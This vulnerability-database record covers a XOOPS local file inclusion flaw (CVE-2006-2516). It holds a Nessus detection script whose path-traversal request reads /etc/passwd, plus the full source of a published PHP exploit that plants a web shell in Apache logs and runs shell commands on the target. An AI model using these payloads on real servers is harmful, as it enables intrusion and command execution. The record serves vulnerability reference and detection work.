XOOPS xoopsConfig Parameter Variable Overwrite Local File Inclusion
2006-05-23T00:00:00
ID XOOPS_NOCOMMON_FILE_INCLUDE.NASL Type nessus Reporter This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2006-05-23T00:00:00
Description
The version of XOOPS installed on the remote host allows an
unauthenticated attacker to skip processing of the application's
'include/common.php' script and thereby to gain control of the
variables '$xoopsConfig[language]' and '$xoopsConfig[theme_set]',
which are used by various scripts to include PHP code from other
files. Successful exploitation of these issues requires that PHP's
'register_globals' setting be enabled and can be used to view
arbitrary files or to execute arbitrary PHP code on the remote host,
subject to the privileges of the web server user id.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(21581);
script_version("1.15");
script_cve_id("CVE-2006-2516");
script_bugtraq_id(18061);
script_name(english:"XOOPS xoopsConfig Parameter Variable Overwrite Local File Inclusion");
script_summary(english:"Tries to read a local file using XOOPS");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is vulnerable to
local file include attacks." );
script_set_attribute(attribute:"description", value:
"The version of XOOPS installed on the remote host allows an
unauthenticated attacker to skip processing of the application's
'include/common.php' script and thereby to gain control of the
variables '$xoopsConfig[language]' and '$xoopsConfig[theme_set]',
which are used by various scripts to include PHP code from other
files. Successful exploitation of these issues requires that PHP's
'register_globals' setting be enabled and can be used to view
arbitrary files or to execute arbitrary PHP code on the remote host,
subject to the privileges of the web server user id." );
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/434698/30/0/threaded" );
script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_publication_date", value: "2006/05/23");
script_set_attribute(attribute:"vuln_publication_date", value: "2006/05/21");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("xoops_detect.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
script_require_keys("www/xoops");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);
# Test an install.
install = get_kb_item(string("www/", port, "/xoops"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (matches)
{
dir = matches[2];
# Try to exploit one of the flaws to read a file.
file = "../../../../../../../../../../../etc/passwd%00";
u = string(
dir, "/misc.php?",
"xoopsOption[nocommon]=1&",
"xoopsConfig[language]=", file
);
r = http_send_recv3(port: port, method: "GET", item: u);
if (isnull(r)) exit(0);
# There's a problem if...
if (
# there's an entry for root or...
egrep(pattern:"root:.*:0:[01]:", string: r[2]) ||
# we get an error saying "failed to open stream".
egrep(pattern:"main\(.+/etc/passwd\\0/misc\.php.+ failed to open stream", string: r[2]) ||
# we get an error claiming the file doesn't exist or...
egrep(pattern:"main\(.+/etc/passwd\).*: failed to open stream: No such file or directory", string: r[2]) ||
# we get an error about open_basedir restriction.
egrep(pattern:"main.+ open_basedir restriction in effect. File\(.*/etc/passwd", string: r[2])
)
{
r[2] = data_protection::redact_etc_passwd(output:r[2]);
if (egrep(string: r[2], pattern:"root:.*:0:[01]:"))
report = string(
"Here are the contents of the file '/etc/passwd' that Nessus\n",
"was able to read from the remote host :\n",
"\n",
r[2]
);
else report = desc;
security_warning(port:port, extra: report);
exit(0);
}
}
{"id": "XOOPS_NOCOMMON_FILE_INCLUDE.NASL", "bulletinFamily": "scanner", "title": "XOOPS xoopsConfig Parameter Variable Overwrite Local File Inclusion", "description": "The version of XOOPS installed on the remote host allows an\nunauthenticated attacker to skip processing of the application's\n'include/common.php' script and thereby to gain control of the\nvariables '$xoopsConfig[language]' and '$xoopsConfig[theme_set]',\nwhich are used by various scripts to include PHP code from other\nfiles. Successful exploitation of these issues requires that PHP's\n'register_globals' setting be enabled and can be used to view\narbitrary files or to execute arbitrary PHP code on the remote host,\nsubject to the privileges of the web server user id.", "published": "2006-05-23T00:00:00", "modified": "2006-05-23T00:00:00", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/21581", "reporter": "This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.securityfocus.com/archive/1/434698/30/0/threaded"], "cvelist": ["CVE-2006-2516"], "type": "nessus", "lastseen": "2021-01-20T15:49:20", "edition": 26, "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-2516"]}, {"type": "osvdb", "idList": ["OSVDB:25683"]}, {"type": "exploitdb", "idList": ["EDB-ID:1811"]}], "modified": "2021-01-20T15:49:20", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-01-20T15:49:20", "rev": 2}, "vulnersScore": 6.8}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21581);\n script_version(\"1.15\");\n\n script_cve_id(\"CVE-2006-2516\");\n script_bugtraq_id(18061);\n\n script_name(english:\"XOOPS xoopsConfig Parameter Variable Overwrite Local File Inclusion\");\n script_summary(english:\"Tries to read a local file using XOOPS\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is vulnerable to\nlocal file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of XOOPS installed on the remote host allows an\nunauthenticated attacker to skip processing of the application's\n'include/common.php' script and thereby to gain control of the\nvariables '$xoopsConfig[language]' and '$xoopsConfig[theme_set]',\nwhich are used by various scripts to include PHP code from other\nfiles. Successful exploitation of these issues requires that PHP's\n'register_globals' setting be enabled and can be used to view\narbitrary files or to execute arbitrary PHP code on the remote host,\nsubject to the privileges of the web server user id.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/434698/30/0/threaded\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"xoops_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/xoops\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, embedded: 0);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/xoops\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (matches)\n{\n dir = matches[2];\n\n # Try to exploit one of the flaws to read a file.\n file = \"../../../../../../../../../../../etc/passwd%00\";\n u = string(\n dir, \"/misc.php?\",\n \"xoopsOption[nocommon]=1&\",\n \"xoopsConfig[language]=\", file\n );\n r = http_send_recv3(port: port, method: \"GET\", item: u);\n if (isnull(r)) exit(0);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string: r[2]) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\\(.+/etc/passwd\\\\0/misc\\.php.+ failed to open stream\", string: r[2]) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(.+/etc/passwd\\).*: failed to open stream: No such file or directory\", string: r[2]) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(.*/etc/passwd\", string: r[2])\n )\n {\n r[2] = data_protection::redact_etc_passwd(output:r[2]);\n if (egrep(string: r[2], pattern:\"root:.*:0:[01]:\"))\n report = string(\n \"Here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n r[2]\n );\n else report = desc;\n\n security_warning(port:port, extra: report);\n exit(0);\n }\n}\n", "naslFamily": "CGI abuses", "pluginID": "21581", "cpe": [], "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:27:20", "description": "mainfile.php in XOOPS 2.0.13.2 and earlier, when register_globals is enabled, allows remote attackers to overwrite variables such as $xoopsOption['nocommon'] and conduct directory traversal attacks or include PHP files via (1) xoopsConfig[language] to misc.php or (2) xoopsConfig[theme_set] to index.php, as demonstrated by injecting PHP sequences into a log file.\nSuccessful exploitation requires that \"register_globals\" is enabled, and that \"magic_quotes_gpc\" is disabled.", "edition": 6, "cvss3": {}, "published": "2006-05-22T22:02:00", "title": "CVE-2006-2516", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2516"], "modified": "2018-10-18T16:40:00", "cpe": ["cpe:/a:xoops:xoops:2.0.5", "cpe:/a:xoops:xoops:2.0.11", "cpe:/a:xoops:xoops:2.0.13.2", "cpe:/a:xoops:xoops:2.0.7", "cpe:/a:xoops:xoops:2.0.4", "cpe:/a:xoops:xoops:2.0.6", "cpe:/a:xoops:xoops:2.0.12_jp", "cpe:/a:xoops:xoops:2.0.2", "cpe:/a:xoops:xoops:2.0.5.1", "cpe:/a:xoops:xoops:2.0", "cpe:/a:xoops:xoops:2.0.3", "cpe:/a:xoops:xoops:2.0.9.2", "cpe:/a:xoops:xoops:2.0.10", "cpe:/a:xoops:xoops:2.0.9.3", "cpe:/a:xoops:xoops:2.0.5.2", "cpe:/a:xoops:xoops:2.0.1", "cpe:/a:xoops:xoops:2.0.13.1", "cpe:/a:xoops:xoops:2.0.9"], "id": "CVE-2006-2516", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2516", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:xoops:xoops:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.12_jp:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.13.2:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:xoops:xoops:2.0.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T14:55:47", "description": "XOOPS <= 2.0.13.2 xoopsOption[nocommon] Remote Exploit. CVE-2006-2516. Webapps exploit for php platform", "published": "2006-05-21T00:00:00", "type": "exploitdb", "title": "XOOPS <= 2.0.13.2 - xoopsOptionnocommon Remote Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-2516"], "modified": "2006-05-21T00:00:00", "id": "EDB-ID:1811", "href": "https://www.exploit-db.com/exploits/1811/", "sourceData": "#!/usr/bin/php -q -d short_open_tag=on\n<?\necho \"XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit\\r\\n\";\necho \"by rgod rgod@autistici.org\\r\\n\";\necho \"site: http://retrogod.altervista.org\\r\\n\\r\\n\";\n\n/*\n works with:\n magic_quotes_gpc = Off\n register_globals = On\n*/\n\nif ($argc<4) {\necho \"Usage: php \".$argv[0].\" host path cmd OPTIONS\\r\\n\";\necho \"host: target server (ip/hostname)\\r\\n\";\necho \"path: path to xoops\\r\\n\";\necho \"cmd: a shell command\\r\\n\";\necho \"Options:\\r\\n\";\necho \" -p[port]: specify a port other than 80\\r\\n\";\necho \" -P[ip:port]: specify a proxy\\r\\n\";\necho \"Examples:\\r\\n\";\necho \"php \".$argv[0].\" localhost /xoops/ \\r\\n\";\necho \"php \".$argv[0].\" localhost /xoops/ ls -la -p81\\r\\n\";\necho \"php \".$argv[0].\" localhost / ls -la -P1.1.1.1:80\\r\\n\";\ndie;\n}\n\n/* hi, back from my annual social engineering tour, this year in Milan ;)\n welcome to this new 0day experience...\n explaination:\n\n vulnerable code in mainfile.php at lines 94-96:\n ...\n if (!isset($xoopsOption['nocommon']) && XOOPS_ROOT_PATH != '') {\n\t\tinclude XOOPS_ROOT_PATH.\"/include/common.php\";\n\t}\n ...\n\n if register_globals = On you can overwrite $xoopsOption['nocommon'] var, to\n skip common.php inclusion where $xoopsConfig['language'] and\n $xoopsConfig['theme_set] are initialized, so, if magic_quotes_gpc=Off\n you can include arbitrary files from local resources, ex., Apache log files:\n\n http://[target]/[path]/misc.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[language]=../../../../../../../../../../var/log/httpd/access_log%00\n http://[target]/[path]/index.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[theme_set]=../../../../../../../../../../var/log/httpd/error_log%00\n\n or, if avatar uploads are enabled:\n\n http://[target]/xoops/html/index.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[theme_set]=../uploads/cavt44703c30d3dbf.jpg%00\n\n this tool inject some php code in apache log files and try to launch commands\n\t\t\t\t\t\t\t\t\t */\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=\" .\";}\n else\n {$result.=\" \".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=\" \".dechex(ord($string[$i]));}\n else\n {$exa.=\" 0\".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\n }\n return $exa.\"\\r\\n\".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction sendpacketii($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n\t$c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n\t}\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n #debug\n #echo \"\\r\\n\".$html;\n}\n\n$host=$argv[1];\n$path=$argv[2];\n$cmd=\"\";$port=80;$proxy=\"\";\n\nfor ($i=3; $i<=$argc-1; $i++){\n$temp=$argv[$i][0].$argv[$i][1];\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\n{$cmd.=\" \".$argv[$i];}\nif ($temp==\"-p\")\n{\n $port=str_replace(\"-p\",\"\",$argv[$i]);\n}\nif ($temp==\"-P\")\n{\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\n}\n}\n$cmd=urlencode($cmd);\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n\necho \"[1] Injecting some code in log files ...\\r\\n\\r\\n\";\n$CODE=\"*delim*<?php error_reporting(0);set_time_limit(0);passthru(\\$_COOKIE[cmd]);die;?>\";\n$packet=\"GET \".$p.$CODE.\" HTTP/1.0\\r\\n\";\n$packet.=\"User-Agent: \".$CODE.\" Googlebot/2.1\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: close\\r\\n\\r\\n\";\nsendpacketii($packet);\nsleep(1);\n\n//fill with possible locations...\n$paths=array(\n\"../../../../../../../../../../var/log/httpd/access_log\",\n\"../../../../../../../../../../var/log/httpd/error_log\",\n\"../apache/logs/error.log\",\n\"../apache/logs/access.log\",\n\"../../apache/logs/error.log\",\n\"../../apache/logs/access.log\",\n\"../../../apache/logs/error.log\",\n\"../../../apache/logs/access.log\",\n\"../../../../apache/logs/error.log\",\n\"../../../../apache/logs/access.log\",\n\"../../../../../apache/logs/error.log\",\n\"../../../../../apache/logs/access.log\",\n\"../../../../../../apache/logs/error.log\",\n\"../../../../../../apache/logs/access.log\",\n\"../logs/error.log\",\n\"../logs/access.log\",\n\"../../logs/error.log\",\n\"../../logs/access.log\",\n\"../../../logs/error.log\",\n\"../../../logs/access.log\",\n\"../../../../logs/error.log\",\n\"../../../../logs/access.log\",\n\"../../../../../logs/error.log\",\n\"../../../../../logs/access.log\",\n\"../../../../../../logs/error.log\",\n\"../../../../../../logs/access.log\",\n\"../../../../../../../../../../etc/httpd/logs/acces_log\",\n\"../../../../../../../../../../etc/httpd/logs/acces.log\",\n\"../../../../../../../../../../etc/httpd/logs/error_log\",\n\"../../../../../../../../../../etc/httpd/logs/error.log\",\n\"../../../../../../../../../../var/www/logs/access_log\",\n\"../../../../../../../../../../var/www/logs/access.log\",\n\"../../../../../../../../../../usr/local/apache/logs/access_log\",\n\"../../../../../../../../../../usr/local/apache/logs/access.log\",\n\"../../../../../../../../../../var/log/apache/access_log\",\n\"../../../../../../../../../../var/log/apache/access.log\",\n\"../../../../../../../../../../var/log/access_log\",\n\"../../../../../../../../../../var/www/logs/error_log\",\n\"../../../../../../../../../../var/www/logs/error.log\",\n\"../../../../../../../../../../usr/local/apache/logs/error_log\",\n\"../../../../../../../../../../usr/local/apache/logs/error.log\",\n\"../../../../../../../../../../var/log/apache/error_log\",\n\"../../../../../../../../../../var/log/apache/error.log\",\n\"../../../../../../../../../../var/log/access_log\",\n\"../../../../../../../../../../var/log/error_log\"\n);\n\n$xpl= array (\n\t \"misc.php?xoopsOption[nocommon]=1&xoopsConfig[language]=\",\n\t \"index.php?xoopsOption[nocommon]=1&xoopsConfig[theme_set]=\"\n\t );\n\nfor ($j=0; $j<=count($xpl)-1; $j++)\n{\n for ($i=0; $i<=count($paths)-1; $i++)\n {\n $a=$i+2;\n echo \"[\".$a.\"] Trying with: \".$xpl[$j].$paths[$i].\"%00\\r\\n\";\n $packet =\"GET \".$p.$xpl[$j].$paths[$i].\"%00 HTTP/1.0\\r\\n\";\n $packet.=\"Host: \".$host.\"\\r\\n\";\n $packet.=\"Cookie: cmd=\".$cmd.\";\\r\\n\";\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\n #debug\n #echo quick_dump($packet);\n sendpacketii($packet);\n if (strstr($html,\"*delim*\"))\n {\n echo \"Exploit succeeded...\\r\\n\";\n $temp=explode(\"*delim*\",$html);\n die($temp[1]);\n }\n }\n}\n//if you are here...\necho \"Exploit failed...\";\n?>\n\n# milw0rm.com [2006-05-21]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1811/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "cvelist": ["CVE-2006-2516"], "edition": 1, "description": "## Vulnerability Description\nXoops contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when passing input to \"xoopsConfig\" array parameter when the \"xoopsOption[nocommon]\" parameter is defined, which will disclose arbitrary files from local resources resulting in a loss of confidentiality.\n## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off' and the register_globals PHP option is 'on'.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Xoops has released a patch to address this vulnerability.\n## Short Description\nXoops contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when passing input to \"xoopsConfig\" array parameter when the \"xoopsOption[nocommon]\" parameter is defined, which will disclose arbitrary files from local resources resulting in a loss of confidentiality.\n## References:\nVendor Specific Solution URL: http://www.xoops.org/modules/news/article.php?storyid=3112\n[Secunia Advisory ID:20176](https://secuniaresearch.flexerasoftware.com/advisories/20176/)\nOther Advisory URL: http://milw0rm.com/exploits/1811\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0416.html\nFrSIRT Advisory: ADV-2006-1895\n[CVE-2006-2516](https://vulners.com/cve/CVE-2006-2516)\nBugtraq ID: 18061\n", "modified": "2006-05-21T08:32:37", "published": "2006-05-21T08:32:37", "href": "https://vulners.com/osvdb/OSVDB:25683", "id": "OSVDB:25683", "title": "XOOPS xoopsConfig Variable Overwrite Arbtirary Local File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}